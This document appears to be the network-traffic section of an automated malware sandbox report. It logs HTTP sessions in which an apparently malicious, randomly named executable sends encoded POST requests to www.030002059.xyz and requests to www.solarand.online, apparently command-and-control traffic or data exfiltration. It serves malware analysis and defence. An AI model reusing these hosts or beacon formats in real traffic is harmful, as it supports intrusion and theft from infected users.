                                                                                                                                                                              Data Raw: 37 38 3d 33 6d 34 49 52 6b 38 6f 54 33 58 4c 56 62 30 36 65 49 70 62 38 2b 70 7a 38 76 6e 44 68 51 79 78 68 62 38 52 54 34 57 51 74 37 31 68 33 53 46 54 2f 56 49 4a 52 67 78 6f 41 2b 53 51 4e 4f 6d 6a 69 6e 74 69 48 4d 71 4d 58 4a 71 7a 78 69 6c 68 39 33 75 67 53 79 44 6f 4b 77 53 6f 53 59 6d 47 41 76 32 57 49 71 4c 2b 72 57 73 51 39 30 53 32 64 56 6c 32 54 54 65 47 50 66 75 75 62 38 34 57 68 54 38 44 2b 6c 4e 50 6f 47 58 76 45 45 61 51 4a 59 61 57 50 79 42 76 48 6c 2b 2b 6b 50 51 6b 65 36 76 76 6e 74 68 57 4f 54 47 75 66 56 47 2f 73 44 68 4a 4e 51 47 70 31 65 2b 32 58 48 38 71 5a 4b 63 6d 4e 4b 74 55 37 6b 72 74 55 51 4f 5a 34 55 68 41 6b 63 62 47 63 50 55 6b 46 39 6e 4d 59 6c 69 73 4f 31 54 6b 33 46 58 56 67 4c 51 2f 4b 78 55 74 73 48 4f 4e 52 32 69 5a 6f 32 42 47 43 53 5a 7a 69 61 58 5a 54 71 6b 4a 31 4d 7a 6d 58 66 76 73 7a 6f 33 6c 59 6d 54 53 68 6a 4a 32 31 37 52 39 4c 4f 4e 54 36 67 78 53 66 75 57 61 76 62 65 42 6d 6e 77 75 44 65 31 35 4f 71 4a 56 52 30 50 54 6a 71 37 57 2b 44 6d 75 62 78 56 [TRUNCATED]
                                                                                                                                                                              Data Ascii: 78=3m4IRk8oT3XLVb06eIpb8+pz8vnDhQyxhb8RT4WQt71h3SFT/VIJRgxoA+SQNOmjintiHMqMXJqzxilh93ugSyDoKwSoSYmGAv2WIqL+rWsQ90S2dVl2TTeGPfuub84WhT8D+lNPoGXvEEaQJYaWPyBvHl++kPQke6vvnthWOTGufVG/sDhJNQGp1e+2XH8qZKcmNKtU7krtUQOZ4UhAkcbGcPUkF9nMYlisO1Tk3FXVgLQ/KxUtsHONR2iZo2BGCSZziaXZTqkJ1MzmXfvszo3lYmTShjJ217R9LONT6gxSfuWavbeBmnwuDe15OqJVR0PTjq7W+DmubxVpZlULsDwC82wmMV8ud4HRXIeRF0ASXuAfFcv3eIUztgqJsIFUJEOWt36s3CQYQ3Jx8f53sA3X6LbhPyojeYtHy701nsH5MuocqYR15ou3k7A2FZoAVlvRcKHQ+zjDmTnBCSW4PuHbbHtbi6Peasgqhx5M2Vj+bjdh16Al+9fbZdulV/KezxFHoYjoKBELmxdekcsaAn62N5ov7n39lmLbzRZQCDB9sPcTmmYwS2Tpd59dIYLWbNQjgQRyBW5gBHWM3zHHI9hucdTapNmmPTvCSTV3+zps3AoYKxxmxgBrf/CVedXHS372+OzVVi2t05aiQ3xJWJ1BFyk/s+G9gXzgxQLYI7yZe5gjZf9Oy0WyNSPt19ydTyOM9jqK9ORgEHzqgOuF6kexRyYfHR8Ig8Ylh67V+EJNAyfRIJLtRNhgz82RgsdIvLZY4QlNu5mc30gEstH7OoqFUmXBbJ0naGTzOz3+Rjhs+5CymZeqL80X+0xMgVB0+n0/5LyuLH9j12en7LFVdHzK0+RRb0v4IugRgb2xS6XPRvSmQdYec+Lj6Lq58EKMCL141cbBk+NuJ8wHX+JMBw1y70nKZQuq1c+pkSxsV+mGFeM3xB7oIgNauquX90jBOtBTvx+X+HSlo/shGQPXQTnuiyanEruiZncGWal5WD5tUzc9x [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:38:26.423516989 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:38:26 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              Data Raw: 37 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 58 6d 6f db 36 10 fe 3e 60 ff 81 73 b1 60 03 24 5a 6f 96 e4 97 04 c8 9a 0c 29 d0 ac 7b 29 02 6c df 68 89 b2 b4 c9 a2 21 d2 76 d2 61 ff 7d cf 91 72 e2 64 dd d6 26 6d 7c 92 c8 bb e3 3d 77 c7 d3 51 8b af 2e de bd 7e ff eb 8f 97 ac 36 eb f6 ec cb 2f 16 c3 95 b1 45 2d 45 89 11 86 7f 0b d3 98 56 9e fd f2 fe e7 f3 f7 ef 98 cf 2e d4 5a 34 1d eb a5 96 fd 4e 96 8b b1 9b 27 e6 c5 f8 5e 6e b1 54 e5 1d d3 e6 ae 95 a7 a3 a5 28 fe 58 f5 6a db 95 7e a1 5a d5 cf d8 ab aa aa e6 ac 52 9d f1 2b b1 6e da bb 19 7b b7 91 1d fb 45 74 da 63 1a d4 87 fa 06 3c 1b 51 96 4d b7 9a b1 60 ce d6 a2 5f 35 1d dd 8e 06 e3 18 73 46 62 ed b2 d9 fd d7 7a 71 85 ff 47 ea 92 60 73 4b 3a f7 4d 69 ea 19 0b 83 e0 eb 23 ad 8f f5 1d 78 26 90 39 58 e1 b7 b2 32 33 26 b6 46 dd 0f f5 cd aa 3e 8c 8d ce 16 82 d5 bd ac 4e 47 b5 31 1b 3d 1b 8f f7 fb 3d d7 a6 17 46 f1 52 8e e0 c1 f6 74 d4 a9 4a b5 ad da 8f ee 6d 57 7d 29 e1 a1 63 8c b0 46 ef 56 ec 76 dd 76 da a9 1b b4 ed 63 ae fa d5 38 0a 82 60 0c 8e 11 db [TRUNCATED]
                                                                                                                                                                              Data Ascii: 7a3Xmo6>`s`$Zo){)lh!va}rd&m|=wQ.~6/E-EV.Z4N'^nT(Xj~ZR+n{Etc<QM`_5sFbzqG`sK:Mi#x&9X23&F>NG1==FRtJmW})cFVvvc8`5r=,`$cRVlarUWU,N8X/6h9buDgI^'<U4I/Nxe7Q'&x3y^~18#{#C3gL]:S#>-'d"C#!] {ctkY2/Hx1ai#'d:BBaAIgC@$mEz&30H|b+&8aiQk%4@@&Lj:`%r@j?<'Xd,M)`AXKHXRk'lu3E^$Cs,<^6OX"qTA%TV@dKa&t2!J%Ps,\O)Mcp^MsH~ajOY^CH(;(vQXdHJ^)EYBdNlVr@"2o1|@qzj1"x$)a*9EQ7{fumeHL<'+A, alhD4_C)LyT/4tP6Sy/nI,XH~% [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:38:26.423537016 CET899INData Raw: 48 7c e8 87 12 4a b6 70 ed 03 80 8f 42 9b 62 45 0a 45 94 d6 13 9e fe b6 8e 26 e4 0c 4a c3 cf d9 30 61 f4 af 39 65 37 1f cc fe c4 1d 03 00 8f 77 0c 44 61 cf a4 c6 d6 fb 9c 1d b3 8e 00 1a 25 98 9c 6f 4b a8 9f 78 31 76 c7 04 34 b6 d5 12 86 d1 6e c5
                                                                                                                                                                              Data Ascii: H|JpBbEE&J0a9e7wDa%oKx1v4nX(3RlCTBhp=5j!Q=Ha9dGSJ=RC=C%HK#;5lL1=TI>5$u`4O"/Ij(X&AQz.}7JQd+EI?2.


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              8192.168.2.449905217.160.0.60803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:38:28.272735119 CET454OUTGET /diem/?hrOd=1DzdIBZXhZaHw2Wp&78=6kQoSQEqBTKFeIgPWItcwMtJ6+nSmUORx6o6L7StlLAM0wJa+kMHFj5rDbCqKJO5phAeVuacSteB2VMr/yCaTx+wFCn7HbSrd9uZdvfw4QtNwXqKd1ZsMRg= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.solarand.online
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 31, 2024 01:38:29.080490112 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 4545
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:38:28 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:38:29.080554008 CET1236INData Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31
                                                                                                                                                                              Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
                                                                                                                                                                              Oct 31, 2024 01:38:29.080565929 CET424INData Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e
                                                                                                                                                                              Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
                                                                                                                                                                              Oct 31, 2024 01:38:29.080576897 CET1236INData Raw: 20 20 20 20 20 0d 0a 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 33 33 33 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 30 63 68 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61
                                                                                                                                                                              Data Ascii: <div style="color:#333;font-size: 18px; max-width: 60ch; margin-left: auto; margin-right: auto; padding: 60px 24px;"> <div style="padding-bottom: 30px" lang="en"><span style="font-size: 14px; color: #777; font-w
                                                                                                                                                                              Oct 31, 2024 01:38:29.080586910 CET551INData Raw: 23 33 39 3b 69 73 74 61 6e 74 20 61 75 63 75 6e 20 63 6f 6e 74 65 6e 75 2e 3c 2f 64 69 76 3e 0d 0a 20 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 73
                                                                                                                                                                              Data Ascii: #39;istant aucun contenu.</div> <div style="padding-bottom: 30px" lang="it"><span style="font-size: 14px; color: #777; font-weight: bold;">Italiano</span><br>Questo sito web &egrave; appena stato attivato. Ancora non c&#39;&egrave; cont


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              9192.168.2.449941161.97.142.144803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:38:34.271497965 CET713OUTPOST /2sun/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.030002059.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.030002059.xyz
                                                                                                                                                                              Referer: http://www.030002059.xyz/2sun/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 4b 48 48 5a 34 30 36 55 5a 35 76 74 46 75 43 50 49 4c 45 47 2b 39 65 6c 55 4b 53 41 67 78 56 4f 30 74 47 34 46 77 33 75 63 75 65 4e 50 47 73 53 50 43 78 65 38 46 75 5a 33 6b 68 79 6f 6f 6f 59 38 71 55 39 39 4b 44 4a 52 53 71 46 4e 6b 67 6d 7a 4c 69 7a 4c 6b 61 50 42 4f 46 39 69 33 34 78 7a 71 34 33 44 35 4b 58 34 6f 66 33 71 7a 4c 33 64 2b 55 45 30 68 52 6b 54 4b 4f 78 69 47 66 47 65 5a 47 6e 50 74 55 54 51 30 52 4a 73 79 64 4e 61 5a 75 38 6b 74 35 41 51 44 50 6d 55 4e 48 2b 71 6e 38 5a 56 68 70 51 48 65 4a 68 56 6e 4f 56 59 74 38 4a 41 55 4b 67 78 6c 57 38 64 46 49 51 44 51 3d 3d
                                                                                                                                                                              Data Ascii: 78=KHHZ406UZ5vtFuCPILEG+9elUKSAgxVO0tG4Fw3ucueNPGsSPCxe8FuZ3khyoooY8qU99KDJRSqFNkgmzLizLkaPBOF9i34xzq43D5KX4of3qzL3d+UE0hRkTKOxiGfGeZGnPtUTQ0RJsydNaZu8kt5AQDPmUNH+qn8ZVhpQHeJhVnOVYt8JAUKgxlW8dFIQDQ==
                                                                                                                                                                              Oct 31, 2024 01:38:35.120378971 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:38:35 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                                                                              Oct 31, 2024 01:38:35.120441914 CET212INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                                                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8
                                                                                                                                                                              Oct 31, 2024 01:38:35.120450974 CET158INData Raw: 86 3b ff 29 cb d9 37 36 ee 45 db fd 4f c5 e8 a2 dd 3d ee ed ed f5 07 b3 6d 9e a2 3f 35 fc 4c ee ca b4 7a 6e 51 56 54 29 b2 b9 46 5b e7 8f cd 95 45 47 b3 7b 5e 6b 54 1a 73 ef 0e a9 cc d4 04 12 30 d1 f2 b1 d4 aa 01 1d b9 4e ee 5b ac 4a d3 da 1d 4a
                                                                                                                                                                              Data Ascii: ;)76EO=m?5LznQVT)F[EG{^kTs0N[JJHk ]hm$q-x8yL!_r0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              10192.168.2.449957161.97.142.144803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:38:36.828089952 CET733OUTPOST /2sun/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.030002059.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.030002059.xyz
                                                                                                                                                                              Referer: http://www.030002059.xyz/2sun/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 4b 48 48 5a 34 30 36 55 5a 35 76 74 45 4d 57 50 4c 72 34 47 75 74 65 6d 59 71 53 41 79 78 56 43 30 74 4b 34 46 78 7a 45 63 38 36 4e 4d 6e 63 53 64 57 6c 65 73 56 75 5a 38 45 68 33 33 34 6f 70 38 71 52 41 39 49 58 4a 52 53 2b 46 4e 6d 6f 6d 7a 34 36 77 5a 45 61 52 55 65 46 2f 6f 58 34 78 7a 71 34 33 44 35 76 77 34 6f 58 33 71 69 37 33 50 4d 39 32 76 42 52 72 65 61 4f 78 6f 6d 66 4b 65 5a 47 56 50 6f 4d 70 51 32 35 4a 73 32 4e 4e 61 74 61 7a 74 74 35 43 65 6a 4f 4d 45 38 7a 77 6b 6b 42 68 61 67 4d 79 5a 36 4d 44 55 68 44 50 4a 63 64 65 53 55 75 54 73 69 66 49 51 47 31 5a 59 63 72 50 70 6c 30 58 71 77 59 55 69 43 45 42 78 6d 6e 7a 73 4e 51 3d
                                                                                                                                                                              Data Ascii: 78=KHHZ406UZ5vtEMWPLr4GutemYqSAyxVC0tK4FxzEc86NMncSdWlesVuZ8Eh334op8qRA9IXJRS+FNmomz46wZEaRUeF/oX4xzq43D5vw4oX3qi73PM92vBRreaOxomfKeZGVPoMpQ25Js2NNataztt5CejOME8zwkkBhagMyZ6MDUhDPJcdeSUuTsifIQG1ZYcrPpl0XqwYUiCEBxmnzsNQ=
                                                                                                                                                                              Oct 31, 2024 01:38:37.663824081 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:38:37 GMT
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              ETag: W/"66cce1df-b96"
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                                                                                                                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                                                                                                                              Oct 31, 2024 01:38:37.663837910 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                                                                                                                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              11192.168.2.449973161.97.142.144803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:38:39.374445915 CET10815OUTPOST /2sun/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.030002059.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.030002059.xyz
                                                                                                                                                                              Referer: http://www.030002059.xyz/2sun/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
